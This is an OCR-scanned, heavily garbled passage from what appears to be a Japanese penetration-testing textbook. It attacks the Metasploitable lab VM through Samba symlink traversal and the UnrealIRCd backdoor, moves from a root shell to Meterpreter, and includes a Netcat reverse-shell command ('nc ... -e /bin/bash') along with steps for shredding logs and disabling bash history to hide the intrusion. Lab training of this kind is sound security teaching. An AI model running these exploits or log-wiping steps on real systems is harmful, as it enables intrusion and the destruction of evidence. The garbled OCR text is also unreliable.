リッ クリ ンク が 張っ て ある 状況 を 考え ます 。 | wide links」 が 有効 だ と 、 そ の 共有 
フォ ル ダ ー に アク セス で きる ユー ザー は 誰 で も その ファ イル を 実行 で き て し まい 
ます 。 

と ころ が 、Metasploitable の Samba で は yes に 設定 され て いま す 。 つ まり 、 
|「 wide links」 が 有効 で す 。Metasploit に は 、「wide links」 が 有効 で ある 場合 に ディ 
レク トリ トラ バー サル を 実現 する モジ ュー ル ("samba_symlink_traversal") が 用 
意 さ れ て いま す 。 デ ィ レ クト リト ラバ ー サ ル と は 、 本 来 ア クセ モス が 禁止 され て い 


9 : 次 の コマ ンド で 、「wide links] が デフ ォ ル ト で 有効 ・ 無 効 の どちら に な っ て いる か を 確認 で 
きま す 。 


Kali で は no、Metasploitable で は yes に な っ て いる こと を 確認 し まし た 。 
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ト 


ィ イレ クト リ に アク セス する 攻撃 で す 。 こ の モジ ュー ル を 実行 する と 、 ル ー ト 
レク トリ (/") に リン ク し て 、 デ ィ レ クト リト ラバ ー サ ル を 実現 し ます 。 





root@⑳ka11:<# msfconsole -q 
( 略 ) 

ms 和 † > use auxil1iary/admin/smb/samba_sym11nk traversa1 

ms 千 aux11iary(samba_sym1ink traversa1 ) > set RHOST 19.9.9.5 

msf auxi1iary(samba_sym1ink traversa1 ) > set SMBSHARE tmp 一 隔 生 E 情 

msf auxi1iary(samba_ sym1ink traversa1 ) > expl1oit 











[*] 19.9.9.5:445 - Connecting to the server.. . 

[*] 19.9.9.5:445 - Trying to mount writeabl]e share "tmp'... 

[*] 19.9.9.5:445 - Trying to 1ink "rootfs' to the root 
fi1esystem. . . 

[*] 19.9.9.5:445 - Now access the fo11owing share to browse the 
Foot †ilesystem : 

[*] 19.9.9.5:445 - \\19.9.9.5\tmp\rootfs\ 


[*] Auxi1iary module execution completed 
ms auxiliary( admin/smb/samba_sym1ink traversa+1 ) > exi 
POOt 仙 Ka11 : > 共 


これ で tmp と いう 共有 フォ ル ダ ー が マウ ント され まし た 。 さらに 、rootfs に ルー 
ディ レク トリ が リン ク さ れ ま し た 。 Metasploit か ら 抜 け て も 、 この 状態 は 維持 さ 


れ て いる の で 、smbclient コ マン ド で 共有 フォ ル ダ ー に アク セス で きま す 。 そ の 
際 、 接 続 先 は |「//< タ ー ゲ ダット の ホス ト 名 >/ 共 有名 」 で 指定 し ます 。 


root 人 Ma11:<# smbc1ient //19.9.9.5/tmp 

MARNING: The “syslog" option 1s deprecated 

Enter MORKGROUP\root'S password: 何 も 入 力 し な いで [Enter] キ ー を 押す 。 
AnonymmOuS login Successful 

Try "help" to get a 1]ist of possible commands. 
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Sb: \> help 使用 で きる コマ ンド を 調べ る 。 


( 略 ) 
SD: \> 1S 
D 9 Sun Jul 15 17:47:98 2918 
ee DR 9 Mon May 21 93:36:12 2912 
.TCE-unix DH 9 Fri Jul ( 略 ) 
rootfs DR 9 Mon May 21 93:36:12 2912 
gconfd-msfadmin DR 9 Sat Jul 14 19:25:32 2918 


7282168 blocks of size 1924. 5424576 blocks available 


SmD: \> cd rootfs 


Smb: \rootfs\> 1S ディ レク トリ 構成 か ら ル ー ト ディ レク トリ その も の と わか る 。 
DR 9 Mon May 21 93:36:12 2912 





を DR 9 Mon May 21 93:36:12 2912 
initrd DR 9 Med Mar 17 97:57:49 2919 
mmed1a DR 9 Med Mar 17 97:55:52 2919 
bin DR 9 Mon May 14 12:35:33 2912 
( 略 ) 

tmp D 9 Sun Jul 15 17:47:98 2918 
SrV DR 9 Med Mar 17 97:57:38 2919 


7282168 blocks of size 1924. 5424576 blocks available 


YootfS が / ディ レク トリ に 対応 し て いる こと が わか り ま し た 。 つ まり 、 パ ス 
ワー ド フ ァイル を 閲覧 し た けれ ば 、「rootfs/etc/passwd ファ イル に アク セス すれ 
ぱ ば よい こと に な り ま す 。 


Smb: \rootfs\> cd etc 
Smb: \root†s\etc\> more DasSwd 
("/etc/passwd" フ ァイル の 内 容 が 表示 され る ) 
([q] キ ー で 抜け る と 、 プ ロン プ ト に 戻る ) 
Eetting file \rootfs\etc\passwd of size 1669 as /tmp/smbmore .-」 
1MxR3] (543.3 KiloBytes/sec ) (average 543.3 KiloBytes/sec ) 
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た だ し 、root 権限 は な い の で 、 シ ャ ドウ ファ イル (rootfs/etc/shadow') の 内 容 
は 見 えま せん 。 

次 は 、get コ マン ド で ファ イル を ダウ ン ロ ー ド で きる こと を 確認 し ます 。 こ こ で 
は 、root ユ ー ザ ー の SSH 公 開 鍵 を ダウ ン ロ ー ド し ます 。 この SSH 公 開 鍵 は 、 
Metasploitable の 公開 鍵 認 証 の 検証 鍵 で あり 、 秘 客 情報 で は あり ませ ん 。 ダ ウン 
ロー ド さ れ た ファ イル は 、 カ レン トディ レク トリ に 保存 され ます 。 





と ころ で 、 Metasploitable 側 で "/etc/samba/smb.conf' ファ イル を 参照 し て み ま 
す 。 共 有名 が tmp と opt の 箇所 を 抽出 する と 次 の よう に な り ま す 。 


"/etc/samba/smb . conf" フ ァイル (一 部 ) 





tmp は 、 書 き 込 み 可 能 (writable = yes) 、 ゲ スト アク セス 可能 (guest ok = yes) 
に な っ て いま す 。 実質 的 に 認証 な し の 共有 フォ ル ダ ー に な っ て いま す 。 
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も し 、CUI で 共有 フォ ル ダ ー を 操作 する の が 不慣れ で あれ ば 、Files で 共有 フォ 
ル ダ ー に アク セス で きま す ( 図 5.7)。 





| | Password required for share tmp on 10.005 


3③ 且 証 ダ イア ログ で は 、 Usemame | root / 
[Anonymous] を 選択 「 二 「 主 
c Comscd * ッ 粒 
ン を 押し ます 。 「 

gm = 

〇 Forqet pa5sword immediately 

PR (④ Remember Password until you logout 
〇 Remember forever 「 





① 選 択 し ます 。 


1 


②③ [smb://< く IP アド レス >/ く 共有 名 >」 を 入力 
し て 「Connect] ボタ ン を 押し ます 。 パ ス が わ 
か る 場合 に は 、 続 け て 指定 で きま す 。 


図 5-7 共有 フォ ル ダ ー に アク セス する 





⑨)Unreal IRC の バッ ク ド ア に 接続 する 

ステ ッ プ 2 の ボー トス キャ ン の 結果 の 中 か ら 、 ボ ポ ボート 6667/6697 の UnrealIRCd 
に 注目 し ます 。UnreadlIRCd は Unreal IRC の デー モン (サー ビス ) プロ グラ ム で 
す 。 どの バー ジョ ン が 使わ れ て いる か を 調べ る た め に 、IRC ク ライ アン ト で アク セ 
ス し て み ま す 。 次 の コマ ンド で 、1IRC ク ライ アン ト で ある hexchat を イン スト ー ル 
し ます 。 


Foot 條 ka11:<# apt nsta11 hexchat -y 
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その 後 、 次 の よう に 入力 し て hexchat を 起動 し ます 。 





oot@ka1i :# hexchat 


root で IRC に ログ イン すべ き で は な いと いう 警告 ダイ アロ グ が 表示 され ます 
が 、 今 回 は テス ト な の で この 忠告 を 無視 し ます 。 「 Network List」 画面 の Networks 
に は 代表 的 な IRC サー バー が すでに 登録 され て いま す 。 今回 は 、 Metasploitable が 
IRC サー バー で ある た め 、[Add] ボタ ン で 新規 登録 し ます 。 そ し て 、[Edit] ボタ 
ン か ら 接 続 先 を 10005 に 変更 し ます 。 設 定 完了 後 、[Connectl で IRC サー バー に 
接続 し ます ( 図 58)。 


| あ P と を る UI に 
② [Add] ボタ ン を 押し て 、 Networks に 変更 し て 、[Closel] ボ 
に "Metasploltable 2" を 追加 し ます 。 ルス 19 た さだ 


ーーーーー ーー 


に と 人 ル 洛 ドレ ビル と 
志 さ れる の で 、[OKJI 
リャ スス 1 9 た さだ 


〇 ④/Metasploltable 2 を 選択 し た 状態 
で 、【Connect] ボタ ン を 押し ます 。 





図 5.8 hexchat の 初期 設定 


接続 に 成功 する と 、 チ ャ ン ネ ル に 参加 する か どう か の 画面 が 表示 され ます 。 こ 
こ で は 、IRC サ ー バ ー の バー ジョ ン を 確認 する こと が 目的 な の で 、Nothing. II 
join a channel later. ( 何 も し な い 。 後 で チャ ン ネ ル に 参加 する ) を 選び ます ( 図 
5-9) 。 
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IRC クラ イア ン 





図 5-9 


接続 後 の 動 作 を 指定 する 


ト が 起動 する と 、 メ ッ セ ー ジ の 中 に "version Unreal3.28.1' と い 


う 文字 列 を 確認 で きま す ( 図 510)。 つ まり 、 バ ー ジ ョ ン は 3.28.1 で す 。[x] ボタ 
ン を 押し て 終了 し て 構い ませ ん 。 


[21:16:281 


[21:16:28] 


I21:16:26] 


21:16:28] 
は 1 : 16 :28] 
121:16:20] 
21:16:28] 
I21:16:20] 
[21:16:21] 
I21:16:211 
[21:16:211 


Sysinfo pl Uoedid 
[necksum Ma teaded 


Fm pre 2.8_1 


人 Ge 5 302 at 1*< で 


*|1irc.Netasnloitahle_-LWN Unreal ヨ .2. 8-1 16UGhrRASORTVSSNWCMGBzVdNMtCD 


* | HANES NAMESX SAFELIST HLN RDCHAMMMELS=3 け CHANMLTNTT= ザ : 3 
MXLIST=b: 69.e:60.I:69 PIECKLEN こ 30 CHANNELLEI に 32 TOPICLEI に 367 KICKLEN=397 
AWAYLEN=367 NMXTARGETS=20 :are SUDDOTted by this server 

*| WALLCHOPS WATCH こ 128 WATCHOPTS=A SILENCE<15 NODE5=12 CHANITYPES=# 
P 躍 評 TX= (Qa0hV] -KZNt CHAMIWODDES=be1.kfL,11,DSnnt iPRCOAUKVCUz 和 5 詩 1G 
ETwORK=<TestlRC CASENAPPLNGeasc ユ 1 EXTBAN-,cqn「 ELIST-THUCT 


STATUSGHSC-KGR+ :arG SUPPOTteG by て his serVver 


*| EXCEPTS INVUEX CDS=KNOCK, AP,DCCALLON USERIP :are suDDorted by this server 


*lThere 8rG 1 usSerS 8nd 9 invisible on 1 servers 
*| 】 havG 1 clionts and 0 sGrvers 

*lLurrent Local Users: 1 SGx: 1 

*ICurrcnt Globut Users: 1 Maxi 1 

ylMODTD File 1s missinq 

*| FOOt 5ets mode ~』 on 「OOt 

*| FOOt SetS Ode 、:x on root 





図 5-10 パー ジョ ン の 確認 
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Exploit.DB (https://www.exploit-db.com/) で "unreal irc 3.28.1" で 検索 する 
と 、Metasploit に “UnrealIRCd 3.2.8.1 - Backdoor Command Execution 
(Metasploit)” が 付属 する こと が わか り ま し た 。 今回 は これ に 対応 する モジ ュー ル 
("exploit/unix/irc/unreal_ircd_3281_backdoor") を 用 いま す 。 
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msf exploit(unixX/irc/unreal ircd 3281 backdoor) > run 


[*] Started reverse TCP double handler on 19.9.9.2:4444 

[*] 19.9.9.5:6667 - Connected to 19.9.9.5:6667... 
:1rc.Metasploitable.LAN NOTICE AUTH :*** Looking UD yOur hostname.. . 

[*] 19.9.9.5:6667 - Sending backdoor command... 

[*] Accepted the first cl]ient connection... 

[*] Accepted the second client connection... 

[*] Command: echo Kc8fVsNJp1oYNuMs: 

[*] Mriting to socket A 

[*] Mriting to socket B 

[*] Reading from sockets... 

[*] Reading from socket B 

[*] B: "KC8fVsNJp1oYNuMs\r\n" 

[*] Matching... 

[*] A 1S input... 

[*] Command she11 session 1 opened (19.9.9.2:4444 -> 19.9.9.5:46132) at 2918-97-15 


21:57:13 +9999 セッ ショ ン 1 で 接続 し た 。 


id 
uid=9(root) g1d=6(root) 


Unreal IRC の バッ ク ド ア に アク セス し て 、 シ ェ ル を 得 ま し た 。 シェル を 故 っ た 
セッ ショ ン を 残し て お き 、Meterpreter に 切り 夫 え て み ま す C10)。 こ れ に は 、 


post/multi/manage/shell_to_meterpreter と いう モジ ュー ル を 使い ます 。 





97 < (GaEE4E る さす 寺 ヤク ービス マム ア アア ルル アア 4 で 2 だ 
Background session 1? [y/N] y 
ms exploit(unix/1irc/unrea] ircd 3281 backdoor) > show sessions 


現在 の (バッ ク グ ラウ ンド を 含む ) セッ ショ ン を 確認 する 。 





Active Sess1onS 


*10: これ まで は Meterpreter か ら シ ェ ル に 切り 夫 え る と いう パタ ー ン が 多かっ た わけ で す が 、 こ 
こ で は 逆 に シェ ル か ら Meterpreter に 切り 装 え よう と し て いま す 。 
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[*] Meterpreter session 2 opened (19.9.9.2:4433 -> | 
19.9.9.5:53522) at 2918-97-15 22:12:33 +9999 
[*] Sending stage (861489 bytes) to 19.9.9.5 

[*] Meterpreter session 3 opened (19.9.9.2:4433 -> | 
19.9.9.5:53523) at 2918-97-15 22:12:36 +9999 
[*] Command stager DrOgress: 199.99% (773/773 bytes ) 

[*] Post module execution completed 

ms 千 post(multi/manage/she1] to_meterpreter) > show sessions 


セッ ショ ン を 確認 する 。 

Active Ssess1ons 

Td Name Type Tnformation 
Connection 

RE CSSEScE 2 こつ: 灯 灯 計 末 2 ス な 5 | 

1 she11] cmd/unix .」 
19.9.9.2:4444 -> 19.9.9.5:45296 (19.9.9.5) 

2 meterpreter x86/1inux | 
19.9.9.2:4433 -> 19.9.9.5:53522 (19.9.9.5) 

3 meterpreter x86/11inux uid= の 9,。 gid=9, euid=9, .-」 


eg1d=9 Q⑩ metasp1oitab1e .1ocaldomain 19.9.9.2:4433 -> | 
19.9.9.5:53523 (19.9.9.5 ) 





mS 千 poSst(multi/manage/she11 to_meterpreter) > Sessions -1 3 
[*] Starting interaction with 3... 


meterpreter > getuid 
SerVer uSername: u1d= の 9。 g1d=O, eu1d= の 9, eg1d= の 9 
meterpreter > Tconfig 


Tnterface 1 


Name 4 
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Hardware MAC 
MTU 

Flags 

TPv4 Address 


TPv6 Netmask 


Tnterface 2 


・ 99: の 9:99: 99 : 99 : 99 
・ 16436 

・ UP,LOOPBACK 
人 

TPv4 NetmasKk : 
TPv6 Address : 
業 je 仙 委 人 


255.9.9.9 
夫人 【 


Name ・ eth9 

Hardware MAC : 98:99:27:8f:bd:89 

MTU ・ 1599 

F1ags ・ UP ,BROADCAST ,MULTTCAST 
TPv4 Address : 19.9.9.5 


TPv4 Netmask : 


TPv6 Address 
TPv6 Netmask 


255 。255 。 255 。 ひ 


・ Te89 : : a99 : 27 生 † : 和 †e8† : bd89 
時 IPISSINHIGEEYSEIIRCE2E7SCETBCEGS 





exit を 実行 する と セッ ショ ン が 閉じ て し まう 。 [Ctrl1] 十 [z] キ ー を 押し て 、 バ ッ ク グ ラウ ンド に する 。 


meterpreter > 

Background session 3? [y/N] 一 財 包 呈 
mmS 和 † poSst(multi/manage/she11 to meterpreter) > sessions -Kk 1 

[*] Ki11ing the fo11owing session(s): 1 -k オ プシ ョ ン で セッ ショ ン を 閉じ る 。 
[*] Ki11ing session 1 攻め た と 2 を 8 中 (Sv 
[*] 19.9.9.5 - Command she11] session 1 closed. 

mS 千 post(multi/manage/ she11] to _meterpreter) > show sessions 











Active sessionSs 


セッ ショ ン が 1 つも な い 。 


No active sesSs1onS . 


以上 より 、Metasploit を 用 いる こと で Unreal IRC の バッ ク ド ア に 簡単 に 接続 し 
ま が Ca 
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同様 の こと を Netcat で 再現 し て み ま す 。 Kali 側 で 、Terminal を 2 つ 新 規 に 起動 


し て 、 そ れ ぞ れ を Terminal A と Terminal B と 呼ぶ こと に し ます 。 
Terminal A で 、 次 を 実行 し ます 。 ポ ー ト 4444 で 待ち 状態 に な り ま す 。 


Poot 同 kal1:<# nc - -v -p 4444 


Terminal B で 、 次 を 実行 し ます 。Metasploit の IRC に 接続 し ます 。 


Foot 合 kal1:<># nc 19.9.9.5 6667 





加 Kal_Linux-3918 く (5*b)_man [ 到 暮 宇 ] - Oroclc VM ruaBon ー ロ 区 












か イル 伝 現 ヤ ジン 替 志 入力 テ 由 47 ス ん ルナ 


roct@⑳kal 


請 請 才 ① Netcat で ポー ト 4444 で 待ち 状態 を 作り ます 。 


ーッ ーー 


_  ④ リ パー スシ ェ ル が 作ら れ た 
ーー 還 イミ ング で ま 示 され ます 


に タン 4 北 - 才 . や kr 区) 
と 、 リ パー スシ ェ ル を 通 
じ て Metasploltable で 
実行 され ます 。 そ の 結果 
は 、 ここ に 表示 され ます 。 













ピュ ーーー エーーー ーーーー ト ーー に アク セス し ます 。 








EK VIew ScarChN TGrn2l HAD 


ー 





E7A や ジル ンス [リリ アパ: だ に クジ 4 は っ 1 
Metasploltable に リ パ ー ス シェ ル を 作 
ワリ た さだ 


FDLT ア に TrF5IG EEET 


図 5-.11 Netcat を 用 いた バッ ク ド ア へ の アク セス 
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Terminal B に て タイ ム ア ウ ト す る 前 に 、 続 け て 次 の コマ ンド を 実行 し ます 。 
IABE:」 以降 の 内 容 が Metasploit 内 で 実行 きれ ます 。 つ まり 、1000.2 (Kali の IP ア 
ドレ ス ) の ポート 4444 に アク セス する リバ ー ス シェ ル を 生成 し ます 。 


AB: nc 19.9.9.2 4444 -e /bin/bash 


Terminal A で 任意 の コマ ンド を 入力 する と 、 リ バー スシ ェ ル を 通じ て 
Metasploitable で その コマ ンド が 実行 され ます 。 結果 は 、Terminal A に 表示 され 
ます ( 図 5.11)。 


⑩ ロ グ を 消去 ・ 改 さん する 

ター ゲッ ト 端 末 (ここ で は Metasploitable) の root 権 限 の シェ ル を 奪取 済み で あ 
れ ば 、 ロ グ を 消去 ・ 改 ぜん で きま す 。 こ れ に より 、 ア タッ ク を 隠蔽 し た り 、 追 跡 
を 逃れ た り で きま す 。 

Linunx シ ステ ム で は 、 ロ グフ ァイル の 多く が /Yvar/log ディ レク トリ に 格納 さ 
れ て いま す 。 ディ スト リ ビ ュ ーション に よっ て は ログ ファ イル の 種類 に 差 が あり 
ます が 、 こ こ で は 共通 に 使わ れ て いる ログ ファ イル ( 表 5-1) に つい て 解説 し ます 。 


表 5-1 ディ スト リ ビ ュ ーション 共通 の ログ ファ イル 


ログ イン 和 失敗 を 記録 する 。 lee 
ログ イン 成功 を 記録 する 。 leet vo 





| ん ar/log/lsstog | ユー ザー の 最終 ログ イン を 録 する 。 
| arallog | ユー ザー の ログ イン 失 回 才 を 記録 する 。 
ュー ザー の ログ イン 失 回 数 を 録 する (11。 |pam_tly2 


これ ら の ログ ファ イル は バイ ナリ ファ イル な の で 、 内 容 を 閲覧 する 際 に は 専用 
の ド を 用 いま す 。 
最も 乱暴 な ログ 消し の 方 法 と し て は 、 こ の ディ レク トリ 内 の ログ ファ イル を 削 


*11 : /var/log/faillog”" と "var/log/tallylog" は ほとん ど 同 様 の 内 容 で す 。 デ ィ ス トリ ビュ ー シ ョ 
ン に より ます が 、 ど ちら か 一 方 は 存在 する は ず で す 。 Kali に は どちら も 存在 し ます 。 "faillog'′ は 
CPU が 32 ビット か 64 ビッ ト か で ファ イル の 構造 が 異な り ま す 。 一 方 、"tallylog” は ビッ ト 数 に 依 
存 し ませ ん 。 
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除 し て し まう こと で す 。 単純 な 方 法 は rm コマ ンド で す が 、 実 の と ころ rm コマ ン 
ド で は ファ イル の 内 容 は 完全 に 消え て いま せん ("12) 。shred コマ ンド を 使う こと 
で 完全 に 削除 で きま す (3 回 ラン ダム 情報 を 書き 込ん で 、 最 後に ゼロ で 上 書き し て 
か ら 、 フ ァイル を 削除 する )。 し か し 、 フ ァイル が 消え て いれ ば 、 す ぐに ば れ て し 
まう か も し れ ま せん 。 


# shred -n 3 -zu /var/1og/messages 


-n : ラン ダム 情報 を 書き 込む 回 数 。 
-z : 最後 に ゼロ を 書き 込む 。 
-u: shred 終 了 後 に ファ イル を 削除 する 。 


次 の アプ ロー チ は 、 フ ァイル の 中 身 だ け を クリ ア す る と いう 方 法 で す 。 リ ダイ 
レク ト の 「>」 の 左側 に は 何 も 指 定 し ませ ん 。 これ を 実行 する と 、 そ の ファ イル の 
内 容 だ けが クリ ア さ れ 、 フ ァイル その も の は 残り ます (13)。 


$ > < ター ゲッ ト の ファ イル パス > 


Linunx で は 、 コ マン ド を 入力 する と キャ ッシュ され 、 あ る タイ ミン グ で コマ ンド 
履歴 に 記録 きれ て いま す ("14)。 こ れ は [1] キー を 入力 し た と き に 過去 の コマ ン 
ド を 表示 する こと で 、 入 力 の 手間 を 軽減 する こと を 目的 と し て いま す 。 セ キュ リ 
ティ の 観点 か らい えば 、 コ マン ド 履 歴 は 攻撃 の 痕跡 を 追い や すい 情報 と いえ ます 。 


*12 :rm コマ ンド で ファ イル を 削除 する と 、 フ ァイル の ji ノ ー ド を 指す リン ク は 削除 され ます が 、 
ノー ド そ の も の は 削除 され ま せん 。 すべ て の リン ク が 削除 され る まで 、ji ノ ー ド と それ に 関連 付け 
られ た デー タ は 上 書き され ませ ん 。 つ まり 、 デ ー タ は 見 えな い だ け で あり 、 ス トレ ー ジ 上 に 存在 
し て いる こと に な り ま す 。 

*13 :「echo "> < ファ イル パス >」 と する と 、 内 容 は クリ ア さ れ ま す が 、 空 行 が 入っ て し まい ま 
す 。 そ の た め 、 本文 で 解説 し た 状況 と は 変わ り ま す 。 む し ろ [rm < ファ イル パス >」 を 実行 し た 
後に 、「touch < ファ イル パス >」| を 実行 し た 状況 と 近い と いえ ます 。 


*14 : bash を 終了 し た り (すなわち Terminal を 閉じ た り )、history -a コ マン ド を 実行 し た り し た 
タイ ミン グ で 追記 され ます 。 つ まり 、 リ アル タイ ム で 記録 さき れる わけ で は あり ませ ん 。 
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Kai の bash で は デフ ォ ル ト で 最新 の 1000 コ マン ド を 記録 する よう に な っ て い 
ます ("15)。 具体 的 に は ユー ザー の ホー ム デ ィ レ クト リ の "bash_history" ファ イ 
ル に 記録 きれ て いま す 。 


単純 に "/.bash_history"” ファ イル の 内 容 を クリ ア し て も 、 そ の クリ ア を 実行 し 
た こと その も の が 記録 され て し まい ます 。 コ マン ド 履 歴 の 上 限 値 を 設定 する 環境 
変数 と し て $HISTSIZE が 用 意 さ きれ て いま す 。 そ こ で 、 こ の 環境 変数 の 値 を 0 に し 
て し まい ます 。 





画 この Terminal 上 で の コマ ンド 履歴 の 記録 を 停止 。| 


環境 変数 sHrsTsrZE の 値 を 確認 。 | 


コマ ンド 履歴 を 消去 。 | 





こう する こと で 過去 の コマ ンド 履歴 は 消え 、 新 た な コマ ンド の 履歴 が 記録 され 
る こと も あり ませ ん 。 


Linux に は ログ の 記録 を 集中 管理 する た め に 、syslogd や rsyslogd が 用 いら れ て 
いま す 。 syslogd は UDP で ログ を 転送 し て いま し た 。 一 方 、rsyslogd は syslogd を 
拡張 し た も の で あり 、TCP で も ログ を 転送 で きる よう に な り ま し た 。 Kali で は 
rsyslogd が イン スト ー ル され て いま す 。 rsyslogd が 管理 する ログ ファ イル は 、 設 定 
ファ イル で ある "/etc/rsyslog.conf の 内 容 か ら わ か り ま す 。 代表 的 な ログ ファ イ 
ル は 、 表 5-2 の 通り で す 。 


*15 : Kali の "bashrc' ファ イル に て 、 次 の よう に 定義 され て いま す 。 
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表 5-2 代表 的 な ログ ファ イル 


EE 


以上 で Metasploitable へ の 攻撃 の 紹介 は 終わ り ま す 。Metasploitable に は まだ た 
くさ ん の 脆 玉 性 が 残さ れ て いる の で 、 各 自 挑 戦 し て みる こと を お すす めし ます 。 





John の 総 当 た り 攻 撃 を 効率 化す る 


暗号 化 さ れ た パス ワー ド を 総 当 た り 攻 撃 で 解析 する と いっ た 場面 で は 、Kali の 
スペ ッ ク が 非常 に 重要 と な り ま す 。 そこ で 、 仮 想 マ シン の 設定 に お いて 、 プロ セッ 
サー と メイ ン メ モリ ー の 上 限 値 を 上 げ ま す 。 

物理 PC が 余っ て いて 、 仮 想 マ シン の 構成 より も 性 能 が よい の で あれ ば 、Kali を 
イン スト ー ル し た 解析 専用 PC を 用 意 す る の が 理想 的 と いえ ます 。 


*16 : /var/]og/spooler" が 使わ れる こと も あり ます 。 
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5-3 | Netcat を 用 いた 各種 通信 の 実現 





これ まで Netcat を 使っ た バイ ンド シェ ル と リバ ー ス シェ ル を 納 介 し まし た 。 
Netcat は 、 そ の 他 の 色々 な 通信 も 実現 で きま す 。 


交 ファ イル 転送 


Windows と Kali の 間 で Netcat の 実験 を 行う の で 、 使 用 する Windows に Netcat 


を イン スト ー ル し て お きま す 。 


トー 


転送 する ファ イル を 準備 する 


Windows 側 で 、 次 の よう な 内 容 の in.tkE ファ イル を 用 意 し ます 。 


"in.txt モ "ファ イル 


Happy hacknng! 
コマ ンド プロ ンプ ト で 次 の よう に Netcat を 実行 し ます 。 


C:\Mork\nc111nt>nc -lvp 4444 < “"C:\Mork\in .tx て " 
1istening on [any] 4444 ... 


2) フ ァイル を 転送 する 
Kai か ら Windows (ここ で は IP アド レス を 1000.102 と する ) へ 接続 し ます 。 
PootQkal1:<# nc 19.9.9.192 4444 > out 


する と 、Kali 側 で は Terminal に 何 も 表 示さ れ ま せん 。 一 方 、Windows 側 に は 次 
の よう な メッ セー ジ が 表示 され ます 。 


19.9.9.2: 1nverse host lookup failed: h errno 11994: NO_DATA 
connect to | 19.9.9.192 |] from (UNKNOMN ) [19.9.9.2] 36886: NO_DATA 
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この 時 点 で Kali 側 に ファ イル が 転送 きれ て いま す 。 別 Terminal を 起動 し て 確認 
し ます 。 


Foot 個 ka11:<# 1s out 


CU 存在 し た 。 | 


Foott 個 ka11 :< 井 Ca て ou 


Happy hacknng ! 中 身 も 一 致す る 。 


3 ファ イル 転送 を 終了 する 
終了 する と き は 、 Kali の Terminal で [Ctrl] + [c] キー を 入力 し ます 。 両者 で 
ザ ロロ oO ト が 返っ て き ます 。 


ここ で は 、 テ キス ト フ ァイル を 転送 し まし た が 、 バ イナ リフ ァイル で も 構い ま 
せん 。 あ る Linux 端末 が 攻撃 され だ た と し ます 。 そ うい っ た 場面 で は 、/bin/sh'" が 
改ざん され て いる 欧 れ が あり ます 。 そ の シス テム で 調査 する と 、 攻 撃 の 証拠 が 消 
えた り 、 余 計 な ログ が 増え た り し ます 。 そ こ で 、 そ の "/bin/sh" を 調査 用 の 端末 に 
転送 し ます 。 そ の 際 、 次 の よう に し て 転送 し ます 。 


# nc -lvp 4444 < /bin/bash 


受信 側 で は 転送 され た /bin/bash' を 調査 し て 、 改 きん され て いな いか を 検証 し 
ます 。 


沙 ネッ トワ ー ク を 通じ て ロギング 
Netcat を 通じ て 、 コ マン ド の 実行 結果 を ロギング で きま す 。 証拠 を 他 の 端末 に 
転送 する こと で 、 証 拠 の 信頼 性 を 保証 で きま す 。 


や ファ イル を リア ル タ イ ム で 監視 する 
Kalii で ロギング する も の と し ます 。 Kali で 次 の よう に 実行 し て 、TCP サ ー バ ー 
と し て 動作 させ ます 。 
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そし て 、 別 Terminal を 開い て 、 次 を 実行 し ます 。 こ れ で 、'og.txt ファ イル を 
リア ル タ イ ム に 監視 で きま す 。 





② コ マン ド を 記録 する 

Linux 端末 で コマ ンド を 入力 し 、 そ れ を 記録 し た いと し ます 。 あ る コマ ンド を 実 
行 し た ら 、 そ の 都度 コマ ンド その も の や その 出力 結果 を ロギング し ます 。 特に 、 証 
拠 を 残す 際 に は 日 時 が 重要 で あり 、date コ マン ド の 出力 結果 を 確実 に 残す よう に 
し ます 。 


コマ ンド その も の を 記録 する 





コマ ンド の 出力 結果 を 記録 する 





Kali に 内 容 が 記録 きれ る た びに セッ ショ ン が 閉じ る の で 、 毎 回 ステ ッ プ ① に 戻 
り 、 待 ち 受 け 状 態 に し ます 。 こ こ で は Netcat の 動作 例 の た め に 手動 で 入力 し まし 
た が 、 運 用 の 場 で は 専用 の スク リプ ト を 用 意 し ます 。 
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バ パス ワー ド フ ァイル と シャ ドウ パス ワー ド 


Linux で は 、 ユ ー ザ ー 情 報 を パス ワー ド フ ァイル (/etc/passwd ) と シャ ドウ 
ファ イル ("/etc/shadow") の 2 つの ファ イル に 格納 し て いま す 。 

パス ワー ド フ ァイル ("/etc/passwd') は 、 ユ ー ザ ー の アカ ウン ト 情 報 が 格納 さき 
れ て いま す 。 1 行 に 1 ユー ザー ずつ 設定 され て お り 、 次 の よう に コロ ン (|:」) 区 功 
り の 書式 に な っ て いま す 。 


ユー ザー 名 :x: ユ ー ザ ーTID: グル ー プ ID: コ メン ト : ホ ー ム ディ レク トリ : 
ログ イン シェ ル 


第 1 フィー ルド : ユー ザー 名 
シス テム に ログ イン する と き の ユ ー ザ ー 名 で す 。 


第 2 フィー ルド : x 

例え ば 、ls -1 コ マン ド な ど で 、UID か ら ユ ー ザ ー 名 を 参照 する と 、 間 接 的 に "/ 
etc/passwd ファ イル を 参照 し て いま す 。 こ うし た 背景 も あり 、 誰 で も "/etc/ 
passwd ファ イル を 読め ます 。 

か つて は ここ に 暗号 化 さ れ た パス ワー ド が 記録 され て いま し た が 、 誰 で も 読め 
て し まう と セキ ュ リ ティ 上 の 問題 と いえ ます 。 そこ で 、 現在 の Linux シス テム で は 
セキ ュ リ ティ の 観点 か ら 、* と いう ダミ ー 文 字 が 入っ て いま す 。 こ の 仕組 み を 
シャ ドウ 化 と いい ます 。 代 わり に 、 管 理 者 権限 の みか ら ア クセ ス で きる シャ ドウ 
ファ イル (/etc/shadow ) に 賠 号 化 さ れ た パス ワー ド が 記録 され て いま す 。 


Poot 佑 ka11i:<# 1s -] /etc/passwd 

-Pw- ド ーーFー- 1 root root 3174 Ju] 6 22:93 /etc/passwd 
Poot 同 ka11:<# 1s -] /etc/shadow 

ー-TW- ド ーーーーー 1 root shadow 1999 Jul 6 21:58 /etc/shadow 
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第 3 フィ ー ル ド : ユー ザーID (UID) 
OS が 内 部 処理 で ユー ザー を 扱う と き に 用 いる ユニ ー ク な 数 値 で す 。root ユ ー 
ザー に は 、0 が 割り 当て られ ます 。 


第 4 フィー ルド : グル ー プ ID (GID) 

OS が 内 部 処理 で グル ー プ を 扱う と き に 用 いる 数 値 で す 。 グ ルー プ は "/etc/ 
prouD ファ イル で 定義 され 、 そ の 第 3 フィ ー ル ド で グル ー プ ID が 割り 当て られ て 
いま す 。 


第 5 フィ ー ル ド : コメ ント 
ユー ザー アカ ウン ト に 関す る 付加 情報 で す 。 通常 、 ユ ー ザ ー 名 が 設定 され ます 。 


第 6 フィ ー ル ド : ホー ム デ ィ レ クト リ 
ユー ザー が ログ イン し た と き の 最 初 の カレ ント ディ レク トリ で す 。 ホ ー ム ディ 
